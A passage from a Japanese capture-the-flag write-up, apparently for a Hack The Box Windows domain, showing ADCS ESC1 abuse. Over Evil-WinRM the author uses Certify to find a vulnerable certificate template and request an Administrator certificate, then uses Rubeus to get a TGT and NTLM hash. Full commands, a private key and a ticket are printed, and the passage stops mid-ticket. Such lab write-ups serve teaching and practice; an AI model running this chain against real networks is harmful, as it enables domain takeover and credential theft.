*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.
------- Administrators --------
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.
...省略
特段ないなぁ。
ps
プロセス見てみます。
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
377 31 12140 20496 2124 0 certsrv
510 19 2312 5476 372 0 csrss
171 13 1660 4784 492 1 csrss
393 33 16420 23236 2644 0 dfsrs
183 12 2408 7848 3632 0 dfssvc
256 14 4008 13576 4344 0 dllhost
10381 7406 130564 128364 2384 0 dns
529 21 20784 39528 1012 1 dwm
49 6 1648 4280 3584 1 fontdrvhost
49 6 1500 4020 3592 0 fontdrvhost
0 0 56 8 0 0 Idle
131 12 1892 5612 1804 0 ismserv
469 26 11032 47644 4016 1 LogonUI
2276 237 85208 72764 624 0 lsass
442 31 38608 52144 2196 0 Microsoft.ActiveDirectory.WebServices
225 13 2812 10252 4508 0 msdtc
0 15 308 11744 88 0 Registry
605 14 5856 13296 616 0 services
53 3 524 1184 296 0 smss
575 31 36668 49664 1832 0 sqlceip
842 59 379172 280164 5440 0 sqlservr
140 9 1860 7852 3200 0 sqlwriter
188 11 1716 8228 8 0 svchost
121 15 3164 7400 328 0 svchost
206 12 1716 7336 344 0 svchost
135 7 1240 5984 712 0 svchost
86 5 900 3888 832 0 svchost
735 16 5388 14748 852 0 svchost
632 19 3876 10324 892 0 svchost
212 9 2024 7524 912 0 svchost
233 10 1716 6992 936 0 svchost
261 15 3596 9424 1060 0 svchost
350 14 10384 14880 1152 0 svchost
401 32 10408 19292 1220 0 svchost
165 9 3140 7824 1244 0 svchost
273 13 3624 11180 1276 0 svchost
372 19 4676 13088 1328 0 svchost
254 15 2948 12016 1360 0 svchost
237 12 2616 11968 1372 0 svchost
429 9 2708 9028 1384 0 svchost
118 7 1196 5736 1412 0 svchost
131 9 1340 5928 1488 0 svchost
390 15 11388 21064 1536 0 svchost
358 17 4848 14468 1540 0 svchost
326 10 2480 8588 1548 0 svchost
316 13 2048 9024 1576 0 svchost
189 12 1868 8200 1704 0 svchost
140 9 1560 6896 1748 0 svchost
223 12 2172 9324 1824 0 svchost
170 9 2112 7396 1836 0 svchost
178 9 1740 8360 2028 0 svchost
465 19 3300 12412 2092 0 svchost
236 25 3252 12612 2108 0 svchost
112 7 1140 5524 2192 0 svchost
189 15 6004 10188 2268 0 svchost
126 7 1252 5780 2404 0 svchost
365 18 7272 24516 2408 0 svchost
240 13 2968 12708 2532 0 svchost
164 10 2000 7584 2540 0 svchost
414 20 19212 32184 2620 0 svchost
311 20 10068 15448 2836 0 svchost
173 11 2324 13092 2888 0 svchost
209 11 2276 8712 3004 0 svchost
220 12 2052 7656 3108 0 svchost
138 8 1588 6364 3140 0 svchost
167 10 2112 13036 3212 0 svchost
281 20 4144 12996 3492 0 svchost
135 9 1552 6660 3616 0 svchost
407 26 3524 13128 3892 0 svchost
124 7 1652 6336 4768 0 svchost
155 9 1876 6828 5332 0 svchost
229 12 2696 12396 5784 0 svchost
312 16 15664 17360 5904 0 svchost
1554 0 188 136 4 0 System
213 16 2348 10552 4200 0 vds
174 11 3236 11968 3156 0 VGAuthService
137 9 1728 7484 2168 1 vm3dservice
148 8 1716 7264 3164 0 vm3dservice
141 10 1808 7684 3680 1 vm3dservice
401 23 10536 23168 3180 0 vmtoolsd
173 11 1388 6888 480 0 wininit
244 12 2540 17080 548 1 winlogon
356 16 18376 28292 2932 0 WmiPrvSE
568 26 46588 62536 0.64 1632 0 wsmprovhost
525 25 50148 68204 0.63 4716 0 wsmprovhost
certsrvのプロセスが回っていることがわかる。 Active Directory 証明書サービス(ADCS)が動いている。
此奴を調べてみる。
Active Directory 証明書サービス - ADCS
Certify
以下からGhostPackのコンパイル済みのハックツールをダウンロードする。
その中でCertify.exeを使用する。
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload Certify.exe
Info: Uploading Certify.exe to C:\Users\Ryan.Cooper\Documents\Certify.exe
Data: 232104 bytes of 232104 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> dir
Directory: C:\Users\Ryan.Cooper\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/10/2023 2:22 PM 174080 Certify.exe
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Certify completed in 00:00:10.2107818
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents>
脆弱性な証明書テンプレートが表示される。
そこで肝となる表示を一つ一つ確認する。
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
上記は証明書を要求する際に、DC含む別のユーザを指定できることがわかります。
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
Client Authenticationに注目する。この証明書テンプレートから生成される証明書を使って、AD内のClientを証明できます。
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
sequel\Domain Usersに注目する。ADで認証された全Userがこの証明書テンプレートから証明書を要求できます。
上記内容は以下のサイトにわかりやすくまとまっている。
この脆弱なテンプレートを用いて証明書を要求する。
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 10
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEArWyrBvDKE6Uj/jUx33XK6HyJWrP15y7SrTkdzgdua+ZY/hnW
8uX+8ES+kLcnjxEdOBpYYDipoIZYoT5GbF70qvJlpH9yriKNvTod819AVFYWTush
rr4XrEenHAPsP8qrBthoHNZaGRm9N6/Y/KJNoGiMjCKDjIqzuBjtFIO2nGHhZaEj
3n2silIbqYi5DqbPBeHvxQqMwGJYTyjxJubjaccoLinTr4+ewsshFPv8ZYRtABGJ
QZQa+8OAH/ZE54Bw9k4zvEhqsBwQxnysG9x7k21NlxRTy4seCR/sZaNCL6hOUBPv
MWgfoH320PgajIzAMRGQsf2mjCqYTCv9OMQtvQIDAQABAoIBAQCpyzxDxlrDEyuD
R0e2Flj8eHnuoUV//DruuH4y6tm0sMmut1PZa0/IpDXD8F691y65cCnYw4FolkCO
Vi+TCQEZocvcW5/HWDNX8l/CmR6ds8+RourOcHUzCtBVQI39Awuh3x1IJqH981Js
BDI5XxsLk3EP/va3ElHVTCpKrI6M2jfBEugYQ0xIIJxwb+IjVb2u4KtveGI6wJx0
nbGKZcc29WF8htjnci5QUs/j8gvDkl26zhQifmDSNiwrfGso0pStudsUW3dcSn0z
/JibEsVoGaW8uLbIBheFw0TjtwFpq5YZnPHsO5Bq9BGs3wYLpX0+Vwq/ly5oD/A+
WnbvI6pNAoGBANLgWoVO0WSLBAJNOd67mpFxh03W3HQIXZw2VdWeONUSMbyz+Zlh
jxLkq4VPrgKNu/37esmVzh2mtWJgaWemBOQIn2Dgc1UUaxs8BL9LXUPUdvqO1RWH
O6n4MJm7VRKN0wnOTbp3BECnEqfwBo+0lk9Sgv17vH5JPKIJmPHVIUNXAoGBANKI
unK1qFAz0nWlfnnK2vzJvzlU3TLFZ5VEpqtkAlkngFIJBtxVc1nxPuQW2LxBVZSf
0UMZDbkvggoxKLQ0ZLYc8F4SKoVx3yVmTGs50eUKKP2JAFTXeLJl5YqhCKMJMtbb
WN2fupnNdF7ILC76Ttdn25mg/NVbs0ap4ZfDz18LAoGAUmXn+P77QtYvEtcqLaYQ
l5RM0lWKfqxmJ4vzrizM+DTLynhop04/oZpIiya/T7AiLPP+3pXynBNv/Ki/hwiQ
EKpt3GTXq/72ewXQtQ61urNiajU1fdwBrECWfPt+GmngdIxwQtQOjVS7LXPUnIJr
2ULcfD/FP3NOheJKKPSmsrECgYAlU05S9ffgOD/Q0cVpjFhkxtPbMzuAO9VQdnpi
Gnn8Gm+6m5UWzSOFR6sRvycvwRmOHwN3tOJk+ZJBglOoFz3ft6O52dimDfk05T0Z
KYgX5kQ8JuTjJcxlPIGEoWYpmYDk7MCFkkL/75f5Ed4beg8uS2B4jT0mCnrvRUEU
qgeC3wKBgQC7gjefCzxIG3N7JWcSC4f6754nJPvAVGSFofYCOXON2QERuc+p2zw0
JyKIUnwkH4IbpqOEeAbUPzeGd1bBybGapD9T6NgfFIYxDO3rfQeBT2ptKZFzH6t6
3a2yQ+Rt2VfwKTB8Bg3XBm6yYZAw/8RXgH8jcxUPDJFSD+CL2aE/Hg==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAAovUJAYck7O9AAAAAAACjANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjMwMzEwMjIxNjA3WhcNMjUwMzEw
MjIyNjA3WjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCtbKsG8MoTpSP+NTHfdcrofIla
s/XnLtKtOR3OB25r5lj+Gdby5f7wRL6QtyePER04GlhgOKmghlihPkZsXvSq8mWk
f3KuIo29Oh3zX0BUVhZO6yGuvhesR6ccA+w/yqsG2Ggc1loZGb03r9j8ok2gaIyM
IoOMirO4GO0Ug7acYeFloSPefayKUhupiLkOps8F4e/FCozAYlhPKPEm5uNpxygu
KdOvj57CyyEU+/xlhG0AEYlBlBr7w4Af9kTngHD2TjO8SGqwHBDGfKwb3HuTbU2X
FFPLix4JH+xlo0IvqE5QE+8xaB+gffbQ+BqMjMAxEZCx/aaMKphMK/04xC29AgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZAIBBTApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFHn3K14HTRgPSEjpvReh1FP29Tp+
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1BZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEAlhQx6AKmFoWyRJWK9dnrp7/zAzcxGz1Hk9BtN305tAijWzpDkDRrHfGK
/fVjgyahstl2SiPBYTCwaWQKCwH4wURtomfbSVknJ1rH2uMfCjZojCFdN1wp+CDA
cU/wRaOs+NzIO/TvYsEuhnV3y+LIJCZKNZsMbm2W447wGP3Zoxc+3U5o/xIr5WKa
wJPmBcqNPTTAzr+ydAMxPs7i9s9QA747vnhnHwXnnulMMi+9BBbvEhEjmosOJoDl
1WDOe+BYNKdAnp7G3TN2NapAhttUNYtpNDlzwjxIgWgao1K8JzUm7iD0Bt6gK2Rj
wtmXjbY2YYYQjmhHyYo7HweXE93LDw==
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:13.6123579
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents>
/altname:Administratorで管理者の証明書を要求する。
上記をKaliの環境でcert.pem, private.keyとして作成する。
cert.pem
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAAovUJAYck7O9AAAAAAACjANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjMwMzEwMjIxNjA3WhcNMjUwMzEw
MjIyNjA3WjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCtbKsG8MoTpSP+NTHfdcrofIla
s/XnLtKtOR3OB25r5lj+Gdby5f7wRL6QtyePER04GlhgOKmghlihPkZsXvSq8mWk
f3KuIo29Oh3zX0BUVhZO6yGuvhesR6ccA+w/yqsG2Ggc1loZGb03r9j8ok2gaIyM
IoOMirO4GO0Ug7acYeFloSPefayKUhupiLkOps8F4e/FCozAYlhPKPEm5uNpxygu
KdOvj57CyyEU+/xlhG0AEYlBlBr7w4Af9kTngHD2TjO8SGqwHBDGfKwb3HuTbU2X
FFPLix4JH+xlo0IvqE5QE+8xaB+gffbQ+BqMjMAxEZCx/aaMKphMK/04xC29AgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZAIBBTApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFHn3K14HTRgPSEjpvReh1FP29Tp+
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1BZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEAlhQx6AKmFoWyRJWK9dnrp7/zAzcxGz1Hk9BtN305tAijWzpDkDRrHfGK
/fVjgyahstl2SiPBYTCwaWQKCwH4wURtomfbSVknJ1rH2uMfCjZojCFdN1wp+CDA
cU/wRaOs+NzIO/TvYsEuhnV3y+LIJCZKNZsMbm2W447wGP3Zoxc+3U5o/xIr5WKa
wJPmBcqNPTTAzr+ydAMxPs7i9s9QA747vnhnHwXnnulMMi+9BBbvEhEjmosOJoDl
1WDOe+BYNKdAnp7G3TN2NapAhttUNYtpNDlzwjxIgWgao1K8JzUm7iD0Bt6gK2Rj
wtmXjbY2YYYQjmhHyYo7HweXE93LDw==
-----END CERTIFICATE-----
private.key
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEArWyrBvDKE6Uj/jUx33XK6HyJWrP15y7SrTkdzgdua+ZY/hnW
8uX+8ES+kLcnjxEdOBpYYDipoIZYoT5GbF70qvJlpH9yriKNvTod819AVFYWTush
rr4XrEenHAPsP8qrBthoHNZaGRm9N6/Y/KJNoGiMjCKDjIqzuBjtFIO2nGHhZaEj
3n2silIbqYi5DqbPBeHvxQqMwGJYTyjxJubjaccoLinTr4+ewsshFPv8ZYRtABGJ
QZQa+8OAH/ZE54Bw9k4zvEhqsBwQxnysG9x7k21NlxRTy4seCR/sZaNCL6hOUBPv
MWgfoH320PgajIzAMRGQsf2mjCqYTCv9OMQtvQIDAQABAoIBAQCpyzxDxlrDEyuD
R0e2Flj8eHnuoUV//DruuH4y6tm0sMmut1PZa0/IpDXD8F691y65cCnYw4FolkCO
Vi+TCQEZocvcW5/HWDNX8l/CmR6ds8+RourOcHUzCtBVQI39Awuh3x1IJqH981Js
BDI5XxsLk3EP/va3ElHVTCpKrI6M2jfBEugYQ0xIIJxwb+IjVb2u4KtveGI6wJx0
nbGKZcc29WF8htjnci5QUs/j8gvDkl26zhQifmDSNiwrfGso0pStudsUW3dcSn0z
/JibEsVoGaW8uLbIBheFw0TjtwFpq5YZnPHsO5Bq9BGs3wYLpX0+Vwq/ly5oD/A+
WnbvI6pNAoGBANLgWoVO0WSLBAJNOd67mpFxh03W3HQIXZw2VdWeONUSMbyz+Zlh
jxLkq4VPrgKNu/37esmVzh2mtWJgaWemBOQIn2Dgc1UUaxs8BL9LXUPUdvqO1RWH
O6n4MJm7VRKN0wnOTbp3BECnEqfwBo+0lk9Sgv17vH5JPKIJmPHVIUNXAoGBANKI
unK1qFAz0nWlfnnK2vzJvzlU3TLFZ5VEpqtkAlkngFIJBtxVc1nxPuQW2LxBVZSf
0UMZDbkvggoxKLQ0ZLYc8F4SKoVx3yVmTGs50eUKKP2JAFTXeLJl5YqhCKMJMtbb
WN2fupnNdF7ILC76Ttdn25mg/NVbs0ap4ZfDz18LAoGAUmXn+P77QtYvEtcqLaYQ
l5RM0lWKfqxmJ4vzrizM+DTLynhop04/oZpIiya/T7AiLPP+3pXynBNv/Ki/hwiQ
EKpt3GTXq/72ewXQtQ61urNiajU1fdwBrECWfPt+GmngdIxwQtQOjVS7LXPUnIJr
2ULcfD/FP3NOheJKKPSmsrECgYAlU05S9ffgOD/Q0cVpjFhkxtPbMzuAO9VQdnpi
Gnn8Gm+6m5UWzSOFR6sRvycvwRmOHwN3tOJk+ZJBglOoFz3ft6O52dimDfk05T0Z
KYgX5kQ8JuTjJcxlPIGEoWYpmYDk7MCFkkL/75f5Ed4beg8uS2B4jT0mCnrvRUEU
qgeC3wKBgQC7gjefCzxIG3N7JWcSC4f6754nJPvAVGSFofYCOXON2QERuc+p2zw0
JyKIUnwkH4IbpqOEeAbUPzeGd1bBybGapD9T6NgfFIYxDO3rfQeBT2ptKZFzH6t6
3a2yQ+Rt2VfwKTB8Bg3XBm6yYZAw/8RXgH8jcxUPDJFSD+CL2aE/Hg==
-----END RSA PRIVATE KEY-----
上記2ファイルを利用して証明書を作成する。passwordはpassとかで適当に作成しておく。
┌──(root㉿kali)-[~/work]
└─# openssl pkcs12 -in cert.pem -inkey private.key -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
この証明書ファイルを用いてKerberos認証を行う。ここからはRubeusさんの出番だ。
Rubeus
Certify.exeを拾ってきたGitHubから同様にRubeus.exeをもってくる。
そのファイルと証明書ファイルを攻撃対象マシンにアップする。
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload cert.pfx
Info: Uploading cert.pfx to C:\Users\Ryan.Cooper\Documents\cert.pfx
Data: 4564 bytes of 4564 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload Rubeus.exe
Info: Uploading Rubeus.exe to C:\Users\Ryan.Cooper\Documents\Rubeus.exe
Data: 595968 bytes of 595968 bytes copied
Info: Upload successful!
Kerberos認証でTGTをもらうわけだが、/getcredentialsオプションでNTLMハッシュをGETできるので、このオプションを使用する。
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials /password:pass
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::5525:aaef:a1de:e889%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
